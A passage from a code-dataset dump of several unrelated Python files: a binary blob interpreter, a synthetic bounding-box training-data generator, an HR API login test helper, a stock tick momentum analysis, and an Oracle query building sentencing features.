"flexutils.io.file_system.simplify_path", "line_number": 60, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 62, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 63, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 64, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 68, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flexlearn.context.Context.get_default_argument", "line_number": 69, "usage_type": "call"}, {"api_name": "flexlearn.context.Context", "line_number": 69, "usage_type": "name"}, {"api_name": "flexutils.misc.string.format_table", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "39312750320", "text": "import numpy as 
np\nimport sys\nimport configparser\n\n\n#%%\nclass BlobInterpreter:\n \"\"\"\n Class to interpret a blob.\n\n Interpreting a blob involves a known structure, which specifies\n 1) Descriptor (short string describing this field)\n 2) Type (word length i.e number of bits, and the type to cast to)\n\n Internally, this is kept as a list of tuples.\n\n This can be used to automatically generate multiple columns when selecting from a blob.\n\n Dynamically sized sections are also supported.\n To specify a dynamically sized section, suffix the descriptor with \"_dyn\".\n\n There are 3 scenarios of dynamically sized sections:\n ------------------------------------------------------\n 1) \"Flex\" arrays: only 1 of these are allowed per structure.\n These will attempt to occupy as much of the blob as possible.\n For example, a structure with\n a: u8\n b_dyn: u8\n c: u16\n\n will interpret a 10-byte blob as having a 7-byte array assigned to \"b_dyn\".\n ------------------------------------------------------\n 2) \"Externally fixed length\" arrays: the length is specified in the descriptor as well,\n like \"_3_dyn\".\n\n For example, a structure with\n a: u8\n b_3_dyn: u8\n c: u16\n\n requires a 6-byte blob, where \"b_3_dyn\" is a 3-byte array\n from the 2nd byte to the 4th byte i.e. [1:4]\n ------------------------------------------------------\n 3) \"Internally fixed length\" arrays: the length is specified in another field.\n These are denoted with \"_?_dyn\", and the associated field must have the same name,\n but suffixed with \"_len\".\n\n For example, a structure with\n a_len: u8\n a_?_dyn: u8\n\n will read \"a_len\" for the number of elements, then use that as the size of\n \"a_?_dyn\". This is commonly found in headers of packets.\n \"\"\"\n\n # Define type dictionary\n STR_TO_TYPE = {\n 'u8': np.uint8,\n 'u16': np.uint16,\n 'u32': np.uint32,\n 'u64': np.uint64,\n 'i8': np.int8,\n 'i16': np.int16,\n 'i32': np.int32,\n 'i64': np.int64,\n 'f32': np.float32,\n 'f64': np.float64,\n 'fc32': np.complex64,\n 'fc64': np.complex128\n }\n\n STR_TO_SIZE = {\n 'u8': 1,\n 'u16': 2,\n 'u32': 4,\n 'u64': 8,\n 'i8': 1,\n 'i16': 2,\n 'i32': 4,\n 'i64': 8,\n 'f32': 4,\n 'f64': 8,\n 'fc32': 8,\n 'fc64': 16\n }\n\n STR_TO_CSTR = {\n 'u8': '%hhu',\n 'u16': '%hu',\n 'u32': '%u',\n 'u64': '%lu',\n 'i8': '%hhd',\n 'i16': '%hd',\n 'i32': '%d',\n 'i64': '%ld',\n 'f32': '%f',\n 'f64': '%f',\n # 'fc32': '%f', # These are a little complicated, let's not handle them for now\n # 'fc64': '%f\n }\n\n def __init__(self, structure: list=[]):\n \"\"\"\n Creates a BlobInterpreter based on a specified structure.\n\n Parameters\n ----------\n structure : list\n Ordered list of tuples, where each tuple is of the form (descriptor, typestr).\n Type strings are specified in STR_TO_TYPE.\n Descriptors are fieldnames, usually used to identify the purpose of that section of data.\n \"\"\"\n if not isinstance(structure, list):\n raise TypeError('Structure must be a list of tuples')\n self._structure = structure\n\n @classmethod\n def fromDictionary(cls, structure: dict):\n \"\"\"\n Generates a BlobInterpreter from a dictionary.\n Dictionaries are expected to be ordered as of Python 3.7.\n \"\"\"\n version = sys.version_info\n if version.major < 3 or (version.major == 3 and version.minor < 7):\n raise TypeError(\"Dictionary interpretation requires Python 3.7 or higher\")\n return cls([(k, v) for k, v in structure.items()])\n \n @classmethod\n def fromConfig(cls, configfilepath: str, sectionname: str):\n \"\"\"\n Generates a BlobInterpreter 
from a configuration file.\n This is loaded with 'configparser'; see https://docs.python.org/3/library/configparser.html.\n Config files are expected to be ordered as of Python 3.7.\n \"\"\"\n version = sys.version_info\n if version.major < 3 or (version.major == 3 and version.minor < 7):\n raise TypeError(\"Configparser interpretation requires Python 3.7 or higher\")\n\n cfg = configparser.ConfigParser()\n cfg.read(configfilepath)\n section = cfg[sectionname]\n return cls([(k, v) for k, v in section.items()])\n\n def appendField(self, descriptor: str, type: str='u8'):\n \"\"\"\n Appends a field to the structure.\n\n Parameters\n ----------\n descriptor : str\n Description of the field.\n type : str\n String that specifies the type to cast to.\n Defaults to 'u8'.\n \"\"\"\n self._structure.append((descriptor, type))\n\n def interpret(self, blob: bytes) -> dict:\n \"\"\"\n Interprets a blob and returns a dict of arrays according to the structure.\n\n Parameters\n ----------\n blob : bytes\n Bytes object, usually obtained from a BLOB column select.\n\n Returns\n -------\n output : dict\n Dictionary of arrays, according to the internal structure.\n \"\"\"\n\n output = dict()\n ptr = 0\n for desc, typestr in self._structure:\n # Turn it into a numpy array\n interpreted = np.frombuffer(\n blob[ptr:ptr+self.STR_TO_SIZE[typestr]],\n dtype=self.STR_TO_TYPE[typestr]\n )\n\n ptr += self.STR_TO_SIZE[typestr]\n\n output[desc] = interpreted\n\n return output\n \n def generateSplitStatement(self, blobColumnName: str, hexOutput: bool=False):\n \"\"\"\n Generates SQL statement fragments that correspond to \n splitting a blob into multiple columns based on the structure.\n\n Parameters\n ----------\n blobColumnName : str\n The SQLite column name that contains the BLOB.\n hexOutput : bool\n Flag to determine whether to return as hex strings, useful for views.\n The default is False, which will return as raw BLOBs.\n \"\"\"\n output = []\n ptr = 1 # Sqlite substr starts from 1\n for desc, typestr in self._structure:\n size = self.STR_TO_SIZE[typestr]\n fragment = f'substr({blobColumnName},{ptr},{size})'\n if hexOutput:\n fragment = f'hex({fragment})'\n fragment = f'{fragment} AS {desc}'\n output.append(fragment)\n ptr += size\n\n return output\n \n def hexifyBlob(self, blob: bytes) -> str:\n \"\"\"\n Returns a hex string form of the blob, akin to what SQLite\n would produce with its hex() function.\n\n Parameters\n ----------\n blob : bytes\n Input bytes object. 
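A usage sketch for the fixed-size path of interpret() above: each field is sliced out of the blob and viewed with np.frombuffer. The structure and values below are hypothetical, and the dynamic "_dyn" scenarios described in the class docstring are not exercised here:

# Inline re-creation of interpret()'s fixed-size loop on a 7-byte blob.
import numpy as np
import struct

# hypothetical layout: a u8 counter, then a u16 and an f32
# (assumes a little-endian host, matching the '<' pack format)
blob = struct.pack("<BHf", 7, 513, 1.5)
structure = [("counter", "u8"), ("flags", "u16"), ("gain", "f32")]

sizes = {"u8": 1, "u16": 2, "f32": 4}
dtypes = {"u8": np.uint8, "u16": np.uint16, "f32": np.float32}
ptr, out = 0, {}
for desc, typestr in structure:
    # one np.frombuffer view per fixed-size field, same slicing scheme as interpret()
    out[desc] = np.frombuffer(blob[ptr:ptr + sizes[typestr]], dtype=dtypes[typestr])
    ptr += sizes[typestr]
print(out)  # counter -> [7], flags -> [513], gain -> [1.5]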
This may come from a slice of the\n            SQLite BLOB column.\n\n        Returns\n        -------\n        h : str\n            Hex string formatted with %02X.\n        \"\"\"\n        h = \"\".join([\"%02X\" % i for i in blob])\n\n        return h\n\n\n\n    \n\n    ", "repo_name": "icyveins7/sew", "sub_path": "sew/blobInterpreter.py", "file_name": "blobInterpreter.py", "file_ext": "py", "file_size_in_byte": 7259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.uint8", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.uint64", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.int8", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.int16", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.int64", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.complex64", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.complex128", "line_number": 69, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 123, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 135, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "24999472925", "text": "# generate training data\nfrom PIL import Image\nimport numpy as np\nimport os\nimport pandas as pd\nnum_imgs = 100\n\nimg_size = 200\nmin_object_size = 1\nmax_object_size = 80\nnum_objects = 1\n\n# set up the array that will hold the image data\ndatas = np.zeros((num_imgs,img_size,img_size,4))\nfor i in range(num_imgs):\n    datas[i,:,:,:] = 255\n# array holding the box data\n# stores x y w h\nboxes = np.zeros((num_imgs,num_objects,4))\n\nfor i in range(num_imgs):\n    for obj in range(num_objects):\n        w,h = np.random.randint(min_object_size,max_object_size,size=2)\n        x = np.random.randint(0,img_size-w)\n        y = np.random.randint(0,img_size-h)\n        # datas[i,x:x+w,y:y+h,:] = 0 \n        datas[i,x:x+w,y:y+h,0] = np.random.randint(0,230) # fill this channel of the rectangle with a random color\n        datas[i,x:x+w,y:y+h,1] = np.random.randint(0,230) # fill this channel of the rectangle with a random color\n        datas[i,x:x+w,y:y+h,2] = np.random.randint(0,230) # fill this channel of the rectangle with a random color\n        boxes[i,obj] = [y,x,h+y,w+x]  # [xmin, ymin, xmax, ymax] in image coordinates (numpy axis 0 is the image y axis)\n# 138\n# 6\n# 155\n# 40\n\nnames_list = []\nnum_imgs_list = []\nx_list = []\ny_list = []\nx_max_list = []\ny_max_list = []\nfor i in range(num_imgs):\n    for obj in range(num_objects):\n        names_list.append(str(i)+'.png')\n        num_imgs_list.append(img_size)\n        x_list.append(int(boxes[i,obj,0]))\n        y_list.append(int(boxes[i,obj,1]))\n        x_max_list.append(int(boxes[i,obj,2]))\n        y_max_list.append(int(boxes[i,obj,3]))\nclass_name = 'rect'\nd = {'filename':names_list,'width':num_imgs_list,'height':num_imgs_list,'class':class_name,'xmin':x_list,'ymin':y_list,'xmax':x_max_list,'ymax':y_max_list}\n# print(d)\nframe=pd.DataFrame(data=d)\nframe.head(5)\n# frame.to_csv('./train_labels.csv',index=None)\nframe.to_csv('./test_labels.csv',index=None)\n\nfor i in range(num_imgs):\n    new_data = np.expand_dims(datas[i],2)\n    Image.fromarray(np.uint8(datas[i])).save('/Users/hdy/Documents/upload/生成训练集/imgs/'+str(i)+'.png')\n\n# img = Image.open('/Users/hdy/Downloads/Unknown-7.png')\n# print(np.array(img))", "repo_name": "egdw/Recognize-Multiple-Shapes", "sub_path": "Google物体检测/训练集生成工具/生成训练集/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1958, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 59, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "21954742624", "text": "import requests,json\n\ndef loginmain():\n\n    def setUp(self):\n        # operations to run before the test\n        print('========================start==========================')\n        self.loginUrl = 'https://tautodiscover.ctgpayroll.com/ehr_saas/newMobile/login/login.mobile'\n        self.checkUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/web/attEmpLog/saveAttEmpLog.mobile'\n        self.headers = {'Content-Type': 'application/json'}\n        self.checkLocationUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/web/attSetLocation/saveAttSetLocation.mobileHr'\n\n    def tearDown(self):\n        # operations to run after the test case finishes\n        print('=========================stop===================================')\n\n    def login_token():\n        # get the token after the user logs in successfully\n        loginUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/newMobile/login/login.mobile'\n        headers = {'Content-Type': 'application/json'}\n        json_param = {\n            'custId': '15921595797504',\n            'deviceId': '8B39DD16-3442-43DE-959D-0EE9CD0C1EE6',\n            'mobile': '18612533709',\n            'verificationCode': '4321'\n        }\n        r = requests.post(loginUrl,data=json.dumps(json_param),headers=headers)\n        return r.json()['result']['data']['token']\n\n    def login_deptId():\n        # get the DeptId after the user logs in successfully\n        loginUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/newMobile/login/login.mobile'\n        headers = {'Content-Type': 'application/json'}\n        json_param = {\n            'custId': '98666751995904',\n            'deviceId': 'E7F91090-FD98-49D0-9382-D37B1059D013',\n            'mobile': '13522535090',\n            'verificationCode': '4321'\n        }\n        r = requests.post(loginUrl,data=json.dumps(json_param),headers=headers)\n        return r.json()['result']['data']['emp']['deptId']", "repo_name": "wanggs4/eHr_SaasEmp", "sub_path": "emp_login/loginmain.py", "file_name": "loginmain.py", "file_ext": "py", "file_size_in_byte": 1899, "program_lang": "python", "lang": "en", "doc_type": "code", 
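A hedged sanity check for the labels file the generator above writes: re-read ./test_labels.csv (the path comes from the script) and confirm every box is non-degenerate and inside the canvas. This assumes the generator has just been run in the same working directory:

# Re-read the generated labels and validate the box columns.
import pandas as pd

df = pd.read_csv("./test_labels.csv")
# every box should have positive extent and lie inside the 200x200 image
assert (df["xmin"] < df["xmax"]).all() and (df["ymin"] < df["ymax"]).all()
assert (df["xmax"] <= df["width"]).all() and (df["ymax"] <= df["height"]).all()
print(df.head())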
"stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.post", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "19308239921", "text": "# Momentum.py\r\n\"\"\"Analyze tick data to extract momentum patterns\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport data_reader\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n data = []\r\n f = open(filename)\r\n try:\r\n reader = csv.reader(f, delimiter=',')\r\n # return an iterator with each iteration being a row of the data file\r\n for idx, row in enumerate(reader):\r\n data.append(row)\r\n finally:\r\n f.close()\r\n\r\n # pre-processing\r\n\r\n data = pd.DataFrame(data)\r\n data = data.iloc[:, -7:-1]\r\n data.columns = [\"bid_price\", \"bid_size\", \"ask_price\", \"ask_size\", \"last_transact_price\", \"last_transact_size\"]\r\n for i in range(data.shape[1]):\r\n data.iloc[:, i] = data.iloc[:, i].apply(float) # convert str to float\r\n \"\"\"\r\n\r\n filename = \"data/US_Equity/SPY/20160302/SPY.csv\"\r\n data = data_reader.read_usequity_tickfile(filename)\r\n data = data[-2000:] # use first 20k ticks\r\n\r\n # calculate weighted mid mkt\r\n data[\"weighted_mid_price\"] = (data[\"bid_price\"] * data[\"ask_size\"] + data[\"ask_price\"] * data[\"bid_size\"]) / \\\r\n (data[\"bid_size\"] + data[\"ask_size\"])\r\n # calculate spread\r\n data[\"spread\"] = data[\"ask_price\"] - data[\"bid_price\"]\r\n\r\n # use wmm to define continuous up/downs in tick price (3, 4, 5 ups or downs in a row)\r\n wmm_up_t = data[\"weighted_mid_price\"].diff() > 0 # uptick\r\n wmm_down_t = data[\"weighted_mid_price\"].diff() < 0 # uptick\r\n\r\n wmm_up_3t = pd.Series(0.0, index=data.index)\r\n wmm_up_4t = pd.Series(0.0, index=data.index)\r\n wmm_up_5t = pd.Series(0.0, index=data.index)\r\n wmm_down_3t = pd.Series(0.0, index=data.index)\r\n wmm_down_4t = pd.Series(0.0, index=data.index)\r\n wmm_down_5t = pd.Series(0.0, index=data.index)\r\n \r\n for i in range(2, len(data)):\r\n if all(wmm_up_t[j] for j in range(i - 2, i + 1)):\r\n wmm_up_3t[i] = 1\r\n for i in range(3, len(data)):\r\n if all(wmm_up_t[j] for j in range(i - 3, i + 1)):\r\n wmm_up_4t[i] = 0.75\r\n for i in range(4, len(data)):\r\n if all(wmm_up_t[j] for j in range(i - 4, i + 1)):\r\n wmm_up_5t[i] = 0.5\r\n for i in range(2, len(data)):\r\n if all(wmm_down_t[j] for j in range(i - 2, i + 1)):\r\n wmm_down_3t[i] = -1\r\n for i in range(3, len(data)):\r\n if all(wmm_down_t[j] for j in range(i - 3, i + 1)):\r\n wmm_down_4t[i] = -0.75\r\n for i in range(4, len(data)):\r\n if all(wmm_down_t[j] for j in range(i - 4, i + 1)):\r\n wmm_down_5t[i] = -0.5\r\n\r\n # compare last transact price to bid/ask/wmm and define momentum\r\n transact_up_t = data[\"last_transact_price\"] >= data[\"ask_price\"] # last transact at or above ask\r\n transact_down_t = data[\"last_transact_price\"] <= data[\"bid_price\"] # last transact at or below bid\r\n\r\n transact_up_10t = pd.Series(0.0, index=data.index)\r\n transact_up_20t = pd.Series(0.0, index=data.index)\r\n transact_up_30t = pd.Series(0.0, index=data.index)\r\n transact_down_10t = pd.Series(0.0, index=data.index)\r\n transact_down_20t = pd.Series(0.0, index=data.index)\r\n transact_down_30t = pd.Series(0.0, index=data.index)\r\n\r\n for i in range(9, len(data)):\r\n if all(transact_up_t[j] for j in 
range(i - 9, i + 1)):\r\n transact_up_10t[i] = 1\r\n for i in range(19, len(data)):\r\n if all(transact_up_t[j] for j in range(i - 19, i + 1)):\r\n transact_up_20t[i] = 0.75\r\n for i in range(29, len(data)):\r\n if all(transact_up_t[j] for j in range(i - 29, i + 1)):\r\n transact_up_30t[i] = 0.5\r\n for i in range(9, len(data)):\r\n if all(transact_down_t[j] for j in range(i - 9, i + 1)):\r\n transact_down_10t[i] = -1\r\n for i in range(19, len(data)):\r\n if all(transact_down_t[j] for j in range(i - 19, i + 1)):\r\n transact_down_20t[i] = -0.75\r\n for i in range(29, len(data)):\r\n if all(transact_down_t[j] for j in range(i - 29, i + 1)):\r\n transact_down_30t[i] = -0.5\r\n\r\n #######################################\r\n # plot\r\n\r\n # 1. plot wmm along with bid, ask, and last transacted price \r\n fig1 = plt.figure(figsize=(12, 9))\r\n fig1.set_tight_layout(True)\r\n ax1 = plt.subplot(211)\r\n ax1.grid()\r\n ax1.plot(data[[\"bid_price\", \"ask_price\", \"weighted_mid_price\"]])\r\n ax1.legend([\"bid\", \"ask\", \"wmm\"], loc=\"upper left\", fontsize=10)\r\n ax1.set_ylabel(\"($)\")\r\n ax1.set_title(\"Tick Prices (SPY)\", fontsize=14)\r\n \r\n plt.setp(ax1.get_xticklabels(), fontsize=12)\r\n \r\n # plot spread\r\n ax2 = plt.subplot(212, sharex=ax1)\r\n ax2.plot(data[\"spread\"], '.', color=\"orange\")\r\n ax2.grid()\r\n ax2.set_xlabel(\"Time\")\r\n ax2.set_ylabel(\"($)\")\r\n ax2.legend([\"Spread\"], loc=\"upper left\", fontsize=10)\r\n\r\n ax3 = ax2.twinx()\r\n ax3.plot(data[\"last_transact_size\"], color=\"dodgerblue\")\r\n ax3.set_ylabel(\"volume\")\r\n ax3.legend([\"Volume\"], loc=\"upper center\", fontsize=10)\r\n\r\n fig1.savefig(\"result/us_equity_data/1.tick_price_and_spreads.png\")\r\n\r\n # 2. plot prices along with defined tick ups/downs \r\n fig2 = plt.figure(figsize=(12, 9))\r\n fig2.set_tight_layout(True)\r\n ax1 = plt.subplot(111)\r\n ax1.grid()\r\n ax1.plot(data[[\"bid_price\", \"ask_price\", \"weighted_mid_price\", \"last_transact_price\"]])\r\n ax1.legend([\"bid\", \"ask\", \"wmm\", \"last_transact\"], loc=\"upper left\", fontsize=8)\r\n ax1.set_xlabel(\"Time\")\r\n ax1.set_ylabel(\"($)\")\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot(wmm_up_3t.index[wmm_up_3t == 1], wmm_up_3t[wmm_up_3t == 1],\r\n '+', color=\"lightgreen\")\r\n ax2.plot(wmm_up_4t.index[wmm_up_4t == 0.75], wmm_up_4t[wmm_up_4t == 0.75],\r\n '+', color=\"green\")\r\n ax2.plot(wmm_up_5t.index[wmm_up_5t == 0.5], wmm_up_5t[wmm_up_5t == 0.5],\r\n '+', color=\"darkslategray\")\r\n ax2.plot(wmm_down_5t.index[wmm_down_5t == -0.5], wmm_down_5t[wmm_down_5t == -0.5],\r\n 'x', color=\"midnightblue\")\r\n ax2.plot(wmm_down_4t.index[wmm_down_4t == -0.75], wmm_down_4t[wmm_down_4t == -0.75],\r\n 'x', color=\"blue\")\r\n ax2.plot(wmm_down_3t.index[wmm_down_3t == -1], wmm_down_3t[wmm_down_3t == -1],\r\n 'x', color=\"lightblue\")\r\n ax2.grid()\r\n ax2.set_ylim(-1.5, 1.5)\r\n #ax2.set_ylabel(\"Indicator\")\r\n ax2.legend([\"3-tick up\", \"4-tick up\", \"5-tick up\", \"5-tick down\", \"4-tick down\", \"3-tick down\"],\r\n loc=\"upper center\", ncol=2, fontsize=8)\r\n ax2.set_title(\"Tick Price Move and Momentum Indicators (SPY)\", fontsize=14)\r\n\r\n fig2.savefig(\"result/us_equity_data/2.tick_price_and_wmm_up_downs.png\")\r\n\r\n # 3. 
plot prices along with defined transact price ups/downs\r\n fig3 = plt.figure(figsize=(12, 9))\r\n fig3.set_tight_layout(True)\r\n ax1 = plt.subplot(111)\r\n ax1.grid()\r\n ax1.plot(data[[\"bid_price\", \"ask_price\", \"weighted_mid_price\", \"last_transact_price\"]])\r\n ax1.legend([\"bid\", \"ask\", \"wmm\", \"last_transt\"], loc=\"upper left\", fontsize=8)\r\n ax1.set_xlabel(\"Time\")\r\n ax1.set_ylabel(\"($)\")\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot(transact_up_10t.index[transact_up_10t == 1], transact_up_10t[transact_up_10t == 1],\r\n '+', color=\"lightgreen\")\r\n ax2.plot(transact_up_20t.index[transact_up_20t == 0.75], transact_up_20t[transact_up_20t == 0.75],\r\n '+', color=\"green\")\r\n ax2.plot(transact_up_30t.index[transact_up_30t == 0.5], transact_up_30t[transact_up_30t == 0.5],\r\n '+', color=\"darkslategray\")\r\n ax2.plot(transact_down_30t.index[transact_down_30t == -0.5], transact_down_30t[transact_down_30t == -0.5],\r\n 'x', color=\"midnightblue\")\r\n ax2.plot(transact_down_20t.index[transact_down_20t == -0.75], transact_down_20t[transact_down_20t == -0.75],\r\n 'x', color=\"blue\")\r\n ax2.plot(transact_down_10t.index[transact_down_10t == -1], transact_down_10t[transact_down_10t == -1],\r\n 'x', color=\"lightblue\")\r\n ax2.grid()\r\n ax2.set_ylim(-1.5, 1.5)\r\n #ax2.set_ylabel(\"Indicator\")\r\n ax2.legend([\"10-tick trade@ask\", \"20-tick trade@ask\", \"30-tick trade@ask\",\r\n \"30-tick trade@bid\", \"20-tick trade@bid\", \"10-tick trade@bid\"],\r\n loc=\"upper center\", ncol=2, fontsize=8)\r\n ax2.set_title(\"Tick Price Move and Transacted Price Pattern (SPY)\", fontsize=14)\r\n\r\n fig3.savefig(\"result/us_equity_data/3.tick_price_and_transacted_price_pattern.png\")\r\n \r\n plt.close('all')\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n", "repo_name": "shuxiangcun/alphapy", "sub_path": "US_Equity_Data.py", "file_name": "US_Equity_Data.py", "file_ext": "py", "file_size_in_byte": 8480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "data_reader.read_usequity_tickfile", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", 
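The n-consecutive-tick flags in the `US_Equity_Data.py` record above are computed with nested Python loops over every index. A vectorized sketch of the same idea with a pandas rolling window (a sum of n booleans equals n exactly when all n are True):

import pandas as pd

def run_flag(up: pd.Series, n: int) -> pd.Series:
    # True where the last n moves were all in the flagged direction.
    return up.astype(int).rolling(n).sum().eq(n)

price = pd.Series([1.0, 1.1, 1.2, 1.3, 1.2, 1.3])
up = price.diff() > 0
three_up = run_flag(up, 3)   # True only at index 3 (three rises in a row)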
"line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}]} +{"seq_id": "35567546804", "text": "import cx_Oracle\nimport pandas as pd\nimport os, sys, time\nfrom riipl import SaveTensor\n\npopulation, lookback, doc_sentences, dim_date, out = sys.argv[1:]\n\ndef main():\n sql = \"\"\"\n SELECT DISTINCT\n pop.riipl_id,\n lb.timestep,\n 'SENTENCED_' || UPPER(ds.offense_type) AS offense\n FROM {population} pop\n LEFT JOIN {lookback} lb\n ON pop.riipl_id = lb.riipl_id\n LEFT JOIN {dim_date} dd\n ON lb.yrmo = dd.yrmo\n INNER JOIN {doc_sentences} ds\n ON lb.riipl_id = ds.riipl_id AND\n dd.date_dt = ds.imposed_date\n \"\"\".format(**globals())\n\n with cx_Oracle.connect(\"/\") as cxn:\n features = pd.read_sql(sql, cxn)\n\n labels = {\n \"SENTENCED_ASSAULT\" : \"serving sentence for assault\",\n \"SENTENCED_DRUG_OFF\" : \"serving sentence for a drug-related offense\",\n \"SENTENCED_HOMICIDE\" : \"serving sentence for homicide\",\n \"SENTENCED_PROP_OFF\" : \"serving sentence for a property-related offense\",\n \"SENTENCED_PUB_OFF\" : \"serving sentence for a public offense\",\n \"SENTENCED_ROBBERY\" : \"serving sentence for robbery\",\n \"SENTENCED_SEX_OFF\" : \"serving sentence for a sex offense\"\n }\n\n tensor = {}\n for feature in labels:\n tensor[feature] = features.loc[features.OFFENSE == feature, [\"RIIPL_ID\", \"TIMESTEP\"]]\n\n fill_values = dict((feature, 0) for feature in tensor)\n\n SaveTensor(tensor, labels, fill_values, (population, \"RIIPL_ID\"), out)\n\n\n# EXECUTE\nif __name__ == \"__main__\":\n start = time.time()\n main()\n print(\"---%s seconds ---\" % (time.time() - start))\n\n# vim: expandtab sw=4 ts=4\n", "repo_name": "ripl-org/predict-opioids", "sub_path": "source/tensors/DOC/sentences.py", "file_name": "sentences.py", "file_ext": "py", "file_size_in_byte": 1698, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cx_Oracle.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 25, "usage_type": "call"}, {"api_name": "riipl.SaveTensor", "line_number": 43, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, 